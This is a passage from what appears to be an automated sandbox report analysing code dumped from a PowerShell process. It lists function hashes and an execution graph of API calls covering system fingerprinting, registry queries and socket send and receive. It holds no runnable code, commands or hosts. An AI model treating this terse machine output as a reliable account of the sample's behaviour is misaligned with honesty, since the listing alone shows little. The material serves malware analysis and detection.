                                                                                    • Instruction ID: 0903e7ab35a038608f4c94ebd380013c3799ac3abe281bc91894276a2e0ca279
                                                                                    • Opcode Fuzzy Hash: bd9ce91f28e84d17019ebc75a21cd41c0f7ae9cd7420e1e6628a02fe1a68d5ec
                                                                                    • Instruction Fuzzy Hash: BBD11434A01248DFCB05CFA8D584A9DFBB2FF88310F258199E816AB365D731ED85CB90
                                                                                    Function 04D695F6 Relevance: .2, Instructions: 188COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c159326bd4d1d723f6791f5306baba39e47b985a597f813b6179c9843353c447
                                                                                    • Instruction ID: 1eb308515ec0e04ca639a2b75e76960d2daa18835dab58f2472cd52f164df1d6
                                                                                    • Opcode Fuzzy Hash: c159326bd4d1d723f6791f5306baba39e47b985a597f813b6179c9843353c447
                                                                                    • Instruction Fuzzy Hash: D6714770A00248DFDF14EFB4D594AADBBF2FF88304F148469D416AB6A4DB35AC86CB40
                                                                                    Function 04D69219 Relevance: .1, Instructions: 119COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ed04eed6c56b836ee26438f296adbb3e9f71238b7d3bd289c97a5d60c96c5d5
                                                                                    • Instruction ID: af0a7b02dbd252ad7d6d1915e3f767cd3b115e8f5a5403b267b2a31054ec0128
                                                                                    • Opcode Fuzzy Hash: 4ed04eed6c56b836ee26438f296adbb3e9f71238b7d3bd289c97a5d60c96c5d5
                                                                                    • Instruction Fuzzy Hash: E6415B716002049FDB14EF64D968AAEBBF6FF89750F1541A8E807EB7A4CB34AC45CB50
                                                                                    Function 04D69473 Relevance: .1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dbf30e151c6892f4a075fac93bd87809e4373225f207b4ad2178091d23931d19
                                                                                    • Instruction ID: 152046182889fd16517bf45a21e6f4ba4227abbb40bd0b4328a3ac7fd7db5a5b
                                                                                    • Opcode Fuzzy Hash: dbf30e151c6892f4a075fac93bd87809e4373225f207b4ad2178091d23931d19
                                                                                    • Instruction Fuzzy Hash: 30415E70A00208DFDB14EFA9D59479EBBF2FF84304F148569D446AB794DB74A845CF80
                                                                                    Function 04D6EC13 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9e8d9f71637e05bd56352956526c0683a5b89a5f07fee69fd9d02e7c3be3f6b5
                                                                                    • Instruction ID: f1943160431a57541d26d4d13c3b403cdd053e76cf05078ad60aef1c7caaf34f
                                                                                    • Opcode Fuzzy Hash: 9e8d9f71637e05bd56352956526c0683a5b89a5f07fee69fd9d02e7c3be3f6b5
                                                                                    • Instruction Fuzzy Hash: BA11C534D10148DFEF24DB98E5987ECB7B2BF4531EF251429C002B6194EB7468CACB16
                                                                                    Function 04D62D5E Relevance: .0, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2087898351.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4d60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13146ceb6a5eb19e58ddbdb73a4d79a33650897a5efa895a4487401b5cadbbb4
                                                                                    • Instruction ID: 242f892683ad9a1e67dff4fefb4a2ff511a990381df6e146d0c3c63f7a143c2c
                                                                                    • Opcode Fuzzy Hash: 13146ceb6a5eb19e58ddbdb73a4d79a33650897a5efa895a4487401b5cadbbb4
                                                                                    • Instruction Fuzzy Hash: B2F0B775A001059FCB15CB9CD990AEEF7B1FF88324F248159E515A72A1C736A852CB90

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:2.1%
                                                                                    Total number of Nodes:1118
                                                                                    Total number of Limit Nodes:18
                                                                                    execution_graph 13661 5b632b0 calloc 13662 5b634e2 13661->13662 13664 5b632d4 memset time srand calloc 13661->13664 13665 5b634b7 free 13664->13665 13667 5b6333a 13664->13667 13665->13662 13689 5b647fd 13667->13689 13669 5b63358 13701 5b65725 13669->13701 13671 5b63366 memset strlen 13704 5b66453 13671->13704 13673 5b63385 13674 5b6349a 13673->13674 13709 5b6993f 13673->13709 13676 5b64a6e free 13674->13676 13677 5b634a3 13676->13677 13678 5b634ab free 13677->13678 13678->13665 13679 5b63395 13680 5b6346c 13679->13680 13681 5b63409 calloc 13679->13681 13712 5b699db 13680->13712 13681->13680 13682 5b6341f 13681->13682 13684 5b63459 strlen 13682->13684 13686 5b6342a sprintf 13682->13686 13684->13680 13686->13686 13688 5b63456 13686->13688 13687 5b63490 free 13687->13674 13688->13684 13720 5b676f6 13689->13720 13691 5b64816 GetCurrentProcess 13725 5b6327f GetModuleHandleA GetProcAddress 13691->13725 13695 5b64891 GetSystemDirectoryW 13699 5b648a7 GetVolumeInformationW 13695->13699 13700 5b648cc __cfltcvt 13695->13700 13696 5b64849 RegQueryValueExW 13697 5b6486f 13696->13697 13698 5b64888 RegCloseKey 13696->13698 13697->13698 13698->13695 13699->13700 13700->13669 13728 5b6f5d6 memset 13701->13728 13703 5b65743 13703->13671 13705 5b66462 strlen 13704->13705 13706 5b66469 13704->13706 13705->13706 13729 5b664ab 13706->13729 13708 5b66477 13708->13673 13710 5b69c78 5 API calls 13709->13710 13711 5b6994e 13710->13711 13711->13679 13715 5b699e6 13712->13715 13713 5b63488 13713->13674 13713->13687 13715->13713 13717 5b69a1b 13715->13717 13734 5b69b1e 13715->13734 13744 5b69cdf GetTickCount 13715->13744 13717->13713 13717->13715 13746 5b69a96 13717->13746 13750 5b69c10 13717->13750 13721 5b67703 13720->13721 13722 5b676ff 13720->13722 13727 5b66636 memset 13721->13727 13722->13691 13724 5b67710 13724->13691 13726 5b632a2 RegOpenKeyExW 13725->13726 13726->13695 13726->13696 13727->13724 13728->13703 13730 5b664df 13729->13730 13731 5b664bc memcmp 13729->13731 13732 5b664d0 13730->13732 13733 5b664e4 memcmp 13730->13733 13731->13730 13731->13732 13732->13708 13733->13732 13735 5b69be4 13734->13735 13737 5b69b30 13734->13737 13735->13717 13737->13735 13743 5b69b7f 13737->13743 13757 5b6ba74 13737->13757 13762 5b6b62c 13737->13762 13775 5b6b985 13737->13775 13782 5b6cfe4 13737->13782 13789 5b6c9b6 13737->13789 13743->13737 13769 5b6b8aa 13743->13769 13745 5b69cee 13744->13745 13745->13715 13749 5b69a9b 13746->13749 13747 5b69af4 13747->13717 13749->13747 13839 5b6a964 13749->13839 13751 5b69c26 GetQueuedCompletionStatus 13750->13751 13752 5b69c1f 13750->13752 13754 5b69c51 GetLastError 13751->13754 13756 5b69c43 13751->13756 13856 5b6a3bd 13752->13856 13754->13756 13756->13717 13758 5b6ba82 13757->13758 13759 5b6bab7 setsockopt 13758->13759 13761 5b6bad2 13758->13761 13760 5b6baf0 WSAGetLastError 13759->13760 13759->13761 13760->13761 13761->13737 13765 5b6b6db 13762->13765 13767 5b6b64c 13762->13767 13763 5b6b719 WSARecv 13764 5b6b7e3 WSAGetLastError 13763->13764 13763->13765 13768 5b6b762 13764->13768 13765->13763 13765->13768 13766 5b6b055 8 API calls 13766->13767 13767->13737 13768->13766 13768->13767 13773 5b6b8c0 13769->13773 13770 5b6b900 13772 5b6b90e 13770->13772 13774 5b6b907 CloseHandle 13770->13774 13771 5b6b8f9 UnregisterWait 13771->13770 13772->13743 13773->13770 13773->13771 13773->13772 13774->13772 13776 5b6b9ea 13775->13776 13781 5b6b998 13775->13781 13777 5b6b9f4 setsockopt 13776->13777 13778 5b6ba31 closesocket 13776->13778 13777->13778 13777->13781 13779 5b6ba44 13778->13779 13778->13781 13795 5b6adbb socket 13779->13795 13781->13737 13783 5b6d003 13782->13783 13785 5b6d0b9 memset WSARecvFrom 13783->13785 13788 5b6d01f 13783->13788 13784 5b6d1a8 13784->13737 13786 5b6d10f WSAGetLastError 13785->13786 13785->13788 13786->13788 13788->13784 13811 5b6ce0a memset 13788->13811 13790 5b6c9d0 13789->13790 13791 5b6c9c9 13789->13791 13826 5b6cafe 13790->13826 13822 5b6c9da 13791->13822 13794 5b6c9ce 13794->13737 13796 5b6ae1d SetHandleInformation 13795->13796 13806 5b6adf5 13795->13806 13797 5b6ae68 memset 13796->13797 13801 5b6ae2c 13796->13801 13798 5b6ae85 13797->13798 13799 5b6aed4 GetLastError 13798->13799 13800 5b6aeb5 13798->13800 13799->13800 13802 5b6aee1 WSAGetLastError 13799->13802 13800->13806 13807 5b6af51 RegisterWaitForSingleObject 13800->13807 13808 5b6ae57 closesocket 13801->13808 13803 5b6aef3 WSAGetLastError 13802->13803 13804 5b6aeeb WSAGetLastError 13802->13804 13805 5b6af03 13803->13805 13804->13805 13809 5b6af0f closesocket 13805->13809 13806->13781 13807->13806 13808->13806 13809->13806 13810 5b6af22 CloseHandle 13809->13810 13810->13806 13812 5b6ce3b memset 13811->13812 13813 5b6cf07 13811->13813 13817 5b6ce99 13812->13817 13815 5b6cf5c GetLastError 13813->13815 13821 5b6ce9d 13813->13821 13816 5b6cf69 WSAGetLastError 13815->13816 13815->13821 13818 5b6cf73 WSAGetLastError 13816->13818 13819 5b6cf7b WSAGetLastError 13816->13819 13820 5b6cecf GetLastError 13817->13820 13817->13821 13818->13821 13819->13821 13820->13821 13821->13784 13825 5b6c9ef 13822->13825 13823 5b6cad4 13823->13794 13825->13823 13830 5b6c71a 13825->13830 13827 5b6cb13 13826->13827 13828 5b6cbaf 13827->13828 13835 5b6c83a 13827->13835 13828->13794 13831 5b6c733 memset 13830->13831 13833 5b6c391 7 API calls 13831->13833 13834 5b6c7d6 13833->13834 13834->13823 13836 5b6c850 QueueUserWorkItem 13835->13836 13838 5b6c8ab 13836->13838 13838->13828 13840 5b6a97d 13839->13840 13841 5b6aa48 13839->13841 13840->13841 13842 5b6a991 13840->13842 13844 5b6aa64 closesocket 13841->13844 13850 5b6a9ce 13841->13850 13852 5b6aa70 13841->13852 13843 5b6a9db shutdown 13842->13843 13842->13850 13845 5b6a9f1 WSAGetLastError 13843->13845 13843->13850 13844->13852 13845->13850 13846 5b6aaf6 13848 5b6ab17 13846->13848 13849 5b6ab0c UnregisterWait 13846->13849 13846->13850 13847 5b6aae9 free 13847->13846 13848->13850 13851 5b6ab1e CloseHandle 13848->13851 13849->13848 13850->13749 13851->13850 13852->13846 13852->13847 13853 5b6aaab UnregisterWait 13852->13853 13854 5b6aac5 CloseHandle 13852->13854 13855 5b6aae7 13852->13855 13853->13852 13854->13852 13855->13847 13857 5b6a3ce 13856->13857 13858 5b69cdf GetTickCount 13857->13858 13859 5b69c25 13857->13859 13858->13859 13859->13751 14048 5b6992a SetErrorMode 14049 5b6993a 14048->14049 14050 5b6bf7a WSAStartup 14049->14050 14065 5b6bd3a memset htons inet_addr 14050->14065 14052 5b6bfa9 14066 5b6bd81 memset htons 14052->14066 14055 5b6bff2 getsockopt 14057 5b6c017 14055->14057 14058 5b6c021 closesocket 14055->14058 14056 5b6c02a WSAGetLastError 14059 5b6c036 14056->14059 14057->14058 14060 5b6c037 socket 14058->14060 14059->14060 14061 5b6c07c WSAGetLastError 14060->14061 14062 5b6c048 closesocket 14060->14062 14063 5b6c088 14061->14063 14062->14063 14065->14052 14067 5b6a59e 4 API calls 14066->14067 14068 5b6bdba socket 14067->14068 14068->14055 14068->14056 14045 5b6531f 14046 5b651cd 7 API calls 14045->14046 14047 5b6533c 14046->14047 12793 5b62372 12794 5b62383 12793->12794 12795 5b6239b 12793->12795 12815 5b6508a 12794->12815 12797 5b623a5 12795->12797 12798 5b623c9 12795->12798 12806 5b65514 malloc memset 12797->12806 12799 5b6234d free 12798->12799 12802 5b62396 12799->12802 12831 5b6ed4f memset 12806->12831 12808 5b65541 12832 5b6ed63 calloc 12808->12832 12810 5b65573 12811 5b623bd 12810->12811 12812 5b6559f __cfltcvt 12810->12812 12823 5b65694 12811->12823 12836 5b6f06e 12812->12836 12814 5b655c6 12814->12811 12816 5b65097 12815->12816 12817 5b6509e 12815->12817 12945 5b650a6 12816->12945 12953 5b6516b 12817->12953 12820 5b62389 12821 5b6234d free 12820->12821 12822 5b6236b 12821->12822 12822->12802 13058 5b6f1e7 12823->13058 12826 5b656ff 13065 5b65365 12826->13065 12828 5b656aa 12830 5b656b0 12828->12830 13062 5b6531f 12828->13062 12830->12802 12831->12808 12833 5b6ed91 12832->12833 12835 5b6eda6 12832->12835 12833->12835 12845 5b6ee1d 12833->12845 12835->12810 12837 5b6f093 12836->12837 12838 5b6f07b strlen 12836->12838 12839 5b6f0c2 12837->12839 12840 5b6f0a1 strlen 12837->12840 12838->12837 12843 5b6f08c __cfltcvt 12838->12843 12841 5b6f0ce calloc 12839->12841 12839->12843 12943 5b7237a 12840->12943 12841->12843 12843->12814 12846 5b6ee33 12845->12846 12847 5b6ee2d 12845->12847 12848 5b6ee41 12846->12848 12865 5b6f4cb 12846->12865 12859 5b6f42f 12847->12859 12852 5b6ee4d 12848->12852 12869 5b6f46f 12848->12869 12857 5b6eeb3 12852->12857 12873 5b6ecba memset 12852->12873 12854 5b6eea3 12874 5b6ef52 memset 12854->12874 12857->12835 12860 5b6f438 12859->12860 12864 5b6f45f _mbstowcs_s 12859->12864 12886 5b72060 12860->12886 12862 5b6f456 12863 5b72060 free 12862->12863 12863->12864 12864->12846 12866 5b6f4d4 12865->12866 12867 5b6f4ec _mbstowcs_s 12865->12867 12866->12867 12868 5b6f4e1 free 12866->12868 12867->12848 12868->12867 12870 5b6f47b 12869->12870 12872 5b6f491 _mbstowcs_s 12869->12872 12890 5b74a37 12870->12890 12872->12852 12873->12854 12938 5b71e21 memset 12874->12938 12876 5b6ef6d 12939 5b71e21 memset 12876->12939 12878 5b6ef79 12940 5b7204f memset 12878->12940 12880 5b6ef82 12941 5b7204f memset 12880->12941 12882 5b6eeab 12883 5b6eee2 memset 12882->12883 12942 5b723c3 memset 12883->12942 12885 5b6ef01 12885->12857 12887 5b72069 _mbstowcs_s 12886->12887 12888 5b7209c _mbstowcs_s 12886->12888 12887->12888 12889 5b72090 free 12887->12889 12888->12862 12889->12888 12891 5b74a40 12890->12891 12899 5b74a6a 12890->12899 12900 5b761bb 12891->12900 12894 5b761bb __cfltcvt free 12895 5b74a58 12894->12895 12908 5b6f848 12895->12908 12899->12872 12901 5b761c4 12900->12901 12907 5b74a4c 12900->12907 12902 5b6f848 _mbstowcs_s free 12901->12902 12903 5b761ca 12902->12903 12904 5b6f848 _mbstowcs_s free 12903->12904 12905 5b761d3 12904->12905 12906 5b6f848 _mbstowcs_s free 12905->12906 12906->12907 12907->12894 12909 5b6f86d 12908->12909 12910 5b6f851 _mbstowcs_s 12908->12910 12912 5b74a6f 12909->12912 12910->12909 12911 5b6f861 free 12910->12911 12911->12909 12923 5b761e1 12912->12923 12914 5b74a7a 12915 5b6f848 _mbstowcs_s free 12914->12915 12916 5b74a83 12915->12916 12917 5b761bb __cfltcvt free 12916->12917 12918 5b74a8f 12917->12918 12919 5b761bb __cfltcvt free 12918->12919 12920 5b74a9b 12919->12920 12921 5b6f848 _mbstowcs_s free 12920->12921 12922 5b74aa7 12921->12922 12922->12899 12924 5b761ed 12923->12924 12925 5b76250 _mbstowcs_s 12923->12925 12926 5b6f848 _mbstowcs_s free 12924->12926 12928 5b76220 12924->12928 12925->12914 12929 5b761fc 12926->12929 12927 5b76245 free 12927->12925 12928->12925 12928->12927 12930 5b761bb __cfltcvt free 12928->12930 12931 5b6f848 _mbstowcs_s free 12929->12931 12930->12928 12932 5b76205 12931->12932 12933 5b6f848 _mbstowcs_s free 12932->12933 12934 5b7620e 12933->12934 12935 5b761bb __cfltcvt free 12934->12935 12936 5b76217 12935->12936 12937 5b6f848 _mbstowcs_s free 12936->12937 12937->12928 12938->12876 12939->12878 12940->12880 12941->12882 12942->12885 12944 5b6f0b3 free 12943->12944 12944->12839 12946 5b650b3 12945->12946 12947 5b650c1 12946->12947 12962 5b6511c 12946->12962 12969 5b64a6e 12947->12969 12954 5b6517e 12953->12954 12955 5b65179 12953->12955 12956 5b650a6 27 API calls 12954->12956 12955->12954 13005 5b6f3f1 12955->13005 12961 5b65188 12956->12961 12958 5b65195 12958->12954 12959 5b651a6 12958->12959 13009 5b651cd 12959->13009 12961->12820 12976 5b6f4f8 12962->12976 12964 5b65127 12965 5b64a6e free 12964->12965 12966 5b65133 12965->12966 12990 5b65145 memset 12966->12990 12968 5b65139 free 12968->12947 12970 5b64a8e 12969->12970 12971 5b64a7b 12969->12971 12973 5b650e9 12970->12973 12971->12970 12992 5b649fc 12971->12992 12995 5b6a4d6 12973->12995 12975 5b650db 12975->12820 12978 5b6f505 _mbstowcs_s 12976->12978 12986 5b6f5b9 _mbstowcs_s 12976->12986 12977 5b6f554 12980 5b6f46f 2 API calls 12977->12980 12989 5b6f577 12977->12989 12978->12977 12979 5b6f42f free 12978->12979 12979->12977 12982 5b6f567 12980->12982 12981 5b6f596 12983 5b6f5a7 strlen 12981->12983 12981->12986 12985 5b6f42f free 12982->12985 12983->12986 12984 5b6f4cb free 12984->12981 12987 5b6f56f 12985->12987 12986->12964 12988 5b6f4cb free 12987->12988 12988->12989 12989->12981 12989->12984 12991 5b65166 12990->12991 12991->12968 12993 5b64a06 free 12992->12993 12994 5b64a11 12992->12994 12993->12994 12994->12970 12996 5b6a4e5 12995->12996 13004 5b6a502 12995->13004 12997 5b6a570 abort 12996->12997 12998 5b6a507 12996->12998 12999 5b6a510 12996->12999 13000 5b6a4fb 12996->13000 12996->13004 13002 5b6cd86 closesocket 12998->13002 13003 5b6cbd9 12 API calls 12999->13003 13001 5b6bb4c 5 API calls 13000->13001 13001->13004 13002->13004 13003->13004 13004->12975 13006 5b6f3f9 13005->13006 13007 5b6f407 13005->13007 13006->13007 13013 5b6e4a0 13006->13013 13007->12958 13010 5b651e5 13009->13010 13010->13010 13045 5b6a8b4 13010->13045 13012 5b6522c 13012->12961 13014 5b6e4a8 13013->13014 13015 5b6e4e9 13013->13015 13014->13015 13018 5b6dd69 13014->13018 13015->13007 13017 5b6e4e5 13017->13007 13019 5b6dda1 __cfltcvt 13018->13019 13021 5b6ddda 13019->13021 13022 5b6de46 13019->13022 13021->13017 13023 5b6dfc0 13022->13023 13024 5b6de5c __cfltcvt 13022->13024 13023->13021 13024->13023 13026 5b71f99 13024->13026 13027 5b71fd7 13026->13027 13028 5b71fa7 13026->13028 13027->13023 13031 5b78ed9 13028->13031 13036 5b78843 13031->13036 13033 5b71fd2 13033->13023 13034 5b78ef3 13034->13033 13041 5b78d64 13034->13041 13037 5b7885b 13036->13037 13040 5b788ca __cfltcvt 13036->13040 13038 5b7887c memset memset 13037->13038 13037->13040 13039 5b788e3 memset 13038->13039 13038->13040 13039->13040 13040->13034 13042 5b78d85 __cfltcvt _mbstowcs_s 13041->13042 13043 5b78de2 memset 13042->13043 13044 5b78e1d 13042->13044 13043->13044 13044->13033 13046 5b6a8d2 13045->13046 13047 5b6a8c3 13045->13047 13046->13047 13050 5b6b478 memset memset 13046->13050 13047->13012 13049 5b6a8f8 13049->13012 13051 5b6b4cf WSASend 13050->13051 13052 5b6b4b9 CreateEventA 13050->13052 13053 5b6b53b GetLastError 13051->13053 13055 5b6b4ec 13051->13055 13052->13051 13054 5b6b548 WSAGetLastError 13053->13054 13053->13055 13057 5b6b4f2 13054->13057 13056 5b6b5c3 RegisterWaitForSingleObject 13055->13056 13055->13057 13056->13057 13057->13049 13059 5b6f1f2 13058->13059 13060 5b656a2 13058->13060 13059->13060 13068 5b6f1c0 13059->13068 13060->12826 13060->12828 13063 5b651cd 7 API calls 13062->13063 13064 5b6533c 13063->13064 13064->12830 13066 5b65378 9 API calls 13065->13066 13067 5b65376 13066->13067 13067->12830 13069 5b6f1e1 13068->13069 13070 5b6f1cd 13068->13070 13069->13059 13070->13069 13073 5b74c16 13070->13073 13074 5b6f1df 13073->13074 13075 5b74c26 13073->13075 13074->13059 13075->13074 13076 5b74c77 13075->13076 13077 5b74c97 13075->13077 13078 5b74cb7 13075->13078 13079 5b74c5f 13075->13079 13080 5b74c7f 13075->13080 13081 5b74c9f 13075->13081 13082 5b74cbf 13075->13082 13083 5b74c67 13075->13083 13084 5b74c87 13075->13084 13085 5b74ca7 13075->13085 13086 5b74c6f 13075->13086 13087 5b74c8f 13075->13087 13088 5b74caf 13075->13088 13089 5b74ccf 13075->13089 13151 5b75979 13076->13151 13185 5b75d2e 13077->13185 13206 5b6e993 13078->13206 13104 5b74d22 13079->13104 13167 5b75c16 13080->13167 13193 5b75f15 13081->13193 13214 5b6ebdd 13082->13214 13114 5b75421 13083->13114 13176 5b75ce5 13084->13176 13198 5b6e967 13085->13198 13141 5b6e62d 13086->13141 13181 5b6e4ef 13087->13181 13201 5b6eb43 13088->13201 13223 5b6ea9e 13089->13223 13105 5b74d3a 13104->13105 13106 5b74d44 13104->13106 13105->13074 13106->13105 13230 5b753bd time 13106->13230 13109 5b74d8f __cfltcvt 13109->13105 13232 5b74f77 13109->13232 13110 5b74e9a 13235 5b752f3 13110->13235 13245 5b6e048 13114->13245 13116 5b75437 13117 5b75447 13116->13117 13122 5b7545e 13116->13122 13138 5b75451 13116->13138 13118 5b6e4a0 4 API calls 13117->13118 13118->13138 13119 5b6e4a0 4 API calls 13119->13138 13120 5b75764 13121 5b6e4a0 4 API calls 13120->13121 13121->13138 13122->13120 13124 5b754c7 __cfltcvt 13122->13124 13131 5b7550f 13122->13131 13123 5b6e4a0 4 API calls 13123->13138 13125 5b755cc time 13124->13125 13127 5b7559f memcmp 13124->13127 13128 5b75548 13124->13128 13124->13131 13126 5b755c1 __cfltcvt 13125->13126 13126->13128 13136 5b75644 13126->13136 13127->13125 13129 5b755b4 13127->13129 13128->13123 13252 5b6d60a 13129->13252 13131->13119 13131->13138 13136->13131 13136->13138 13268 5b7577b 13136->13268 13273 5b75856 13136->13273 13278 5b7581d 13136->13278 13283 5b758e9 13136->13283 13290 5b75892 13136->13290 13295 5b757ea 13136->13295 13300 5b757b0 13136->13300 13138->13074 13142 5b6e65b 13141->13142 13150 5b6e695 13141->13150 13143 5b6e048 5 API calls 13142->13143 13142->13150 13144 5b6e67e 13143->13144 13144->13150 13358 5b6e804 13144->13358 13148 5b6e6e9 13149 5b6e4a0 4 API calls 13148->13149 13148->13150 13149->13150 13150->13074 13152 5b75999 13151->13152 13154 5b759cb 13151->13154 13153 5b6e048 5 API calls 13152->13153 13155 5b759a0 13153->13155 13154->13074 13155->13154 13156 5b759b4 13155->13156 13157 5b759e5 13155->13157 13156->13154 13158 5b6e4a0 4 API calls 13156->13158 13157->13154 13532 5b75b4d 13157->13532 13158->13154 13160 5b75a18 13161 5b6e4a0 4 API calls 13160->13161 13161->13154 13162 5b75a11 13162->13154 13162->13160 13163 5b75aa7 13162->13163 13163->13154 13535 5b6f77e 13163->13535 13165 5b6e4a0 4 API calls 13165->13154 13166 5b75ac6 __cfltcvt 13166->13154 13166->13165 13168 5b75c28 13167->13168 13173 5b75c37 13167->13173 13169 5b6e048 5 API calls 13168->13169 13168->13173 13170 5b75c49 13169->13170 13171 5b75c55 13170->13171 13170->13173 13174 5b75c69 13170->13174 13172 5b6e4a0 4 API calls 13171->13172 13172->13173 13173->13074 13174->13173 13175 5b6e4a0 4 API calls 13174->13175 13175->13173 13177 5b6e048 5 API calls 13176->13177 13178 5b75cf2 13177->13178 13179 5b75cfe 13178->13179 13180 5b6e4a0 4 API calls 13178->13180 13179->13074 13180->13179 13182 5b6e5ab 13181->13182 13183 5b6e509 __cfltcvt 13181->13183 13182->13074 13183->13182 13184 5b6dcd4 4 API calls 13183->13184 13184->13182 13186 5b75d42 13185->13186 13189 5b75d51 13186->13189 13583 5b74b0e 13186->13583 13191 5b75d69 13189->13191 13192 5b6dcd4 4 API calls 13189->13192 13191->13074 13192->13191 13194 5b6d60a 8 API calls 13193->13194 13195 5b75f2f 13194->13195 13196 5b6dcd4 4 API calls 13195->13196 13197 5b75f8e 13195->13197 13196->13197 13197->13074 13199 5b6dcd4 4 API calls 13198->13199 13200 5b6e991 13199->13200 13200->13074 13202 5b6eb51 13201->13202 13203 5b6ebb6 memset 13202->13203 13204 5b6dcd4 4 API calls 13203->13204 13205 5b6ebd8 13204->13205 13205->13074 13207 5b6e048 5 API calls 13206->13207 13208 5b6e9a0 13207->13208 13209 5b6e9e1 13208->13209 13210 5b6e9c0 memset 13208->13210 13211 5b6e9ac 13208->13211 13209->13074 13210->13209 13212 5b6e4a0 4 API calls 13211->13212 13213 5b6e9b6 13212->13213 13213->13074 13215 5b6ec00 13214->13215 13216 5b6e048 5 API calls 13215->13216 13217 5b6ec08 13216->13217 13218 5b6ec15 13217->13218 13221 5b6ec29 13217->13221 13222 5b6ec1f 13217->13222 13219 5b6e4a0 4 API calls 13218->13219 13219->13222 13220 5b6e4a0 4 API calls 13220->13222 13221->13220 13221->13222 13222->13074 13224 5b6eab4 13223->13224 13229 5b6ead0 13223->13229 13225 5b6f4cb free 13224->13225 13227 5b6eac5 free 13225->13227 13227->13229 13656 5b6eb05 13229->13656 13231 5b753fa 13230->13231 13231->13109 13233 5b74faa __cfltcvt 13232->13233 13234 5b74f9b strlen 13232->13234 13233->13110 13234->13233 13236 5b7531f 13235->13236 13238 5b74f36 13235->13238 13237 5b75325 strlen 13236->13237 13240 5b7533e __cfltcvt 13236->13240 13237->13236 13241 5b6dcd4 13238->13241 13239 5b75368 strlen 13239->13240 13240->13238 13240->13239 13243 5b6dcf7 13241->13243 13242 5b6dcfc 13242->13105 13243->13242 13244 5b6dd69 4 API calls 13243->13244 13244->13242 13246 5b6e057 13245->13246 13250 5b6e09e 13245->13250 13305 5b6e0c6 13246->13305 13249 5b6e05d 13249->13250 13251 5b6e0c6 memmove 13249->13251 13309 5b6e123 13249->13309 13250->13116 13251->13249 13253 5b6d62c __cfltcvt 13252->13253 13255 5b6d694 __cfltcvt _mbstowcs_s 13253->13255 13267 5b6d646 _mbstowcs_s 13253->13267 13331 5b6d99c 13253->13331 13259 5b6d7e7 __cfltcvt 13255->13259 13255->13267 13334 5b720a8 13255->13334 13258 5b720a8 calloc 13258->13259 13260 5b6d926 13259->13260 13259->13267 13338 5b7217f 13259->13338 13342 5b71e58 13260->13342 13263 5b6d919 13265 5b7217f 2 API calls 13263->13265 13265->13260 13266 5b71e58 memset 13266->13267 13267->13126 13269 5b75784 13268->13269 13270 5b7578d 13269->13270 13271 5b6e4a0 4 API calls 13269->13271 13270->13136 13272 5b757a7 13271->13272 13272->13136 13274 5b75862 13273->13274 13275 5b6e4a0 4 API calls 13274->13275 13276 5b7586f 13274->13276 13277 5b75889 13275->13277 13276->13136 13277->13136 13279 5b75829 13278->13279 13280 5b6e4a0 4 API calls 13279->13280 13281 5b75836 13279->13281 13282 5b7584d 13280->13282 13281->13136 13282->13136 13285 5b758ff 13283->13285 13287 5b758fb 13283->13287 13284 5b6e4a0 4 API calls 13286 5b75951 13284->13286 13285->13287 13288 5b7592e strlen 13285->13288 13286->13136 13287->13284 13288->13285 13289 5b75939 memcmp 13288->13289 13289->13285 13289->13286 13291 5b7589b 13290->13291 13292 5b6e4a0 4 API calls 13291->13292 13294 5b758bc 13291->13294 13293 5b758df 13292->13293 13293->13136 13294->13136 13296 5b757f6 13295->13296 13297 5b757fd 13296->13297 13298 5b6e4a0 4 API calls 13296->13298 13297->13136 13299 5b75814 13298->13299 13299->13136 13301 5b757bf 13300->13301 13302 5b6e4a0 4 API calls 13301->13302 13303 5b757d4 13301->13303 13304 5b757e1 13302->13304 13303->13136 13304->13136 13306 5b6e0d5 13305->13306 13307 5b6e0da 13305->13307 13306->13307 13308 5b6e0e8 memmove 13306->13308 13307->13249 13308->13307 13310 5b6e130 13309->13310 13314 5b6e15d 13310->13314 13315 5b6e160 13310->13315 13312 5b6e13c 13312->13314 13319 5b6e21c 13312->13319 13314->13249 13316 5b6e198 13315->13316 13317 5b6e4a0 4 API calls 13316->13317 13318 5b6e1bc 13316->13318 13317->13318 13318->13312 13320 5b6e227 13319->13320 13321 5b6e22d 13319->13321 13323 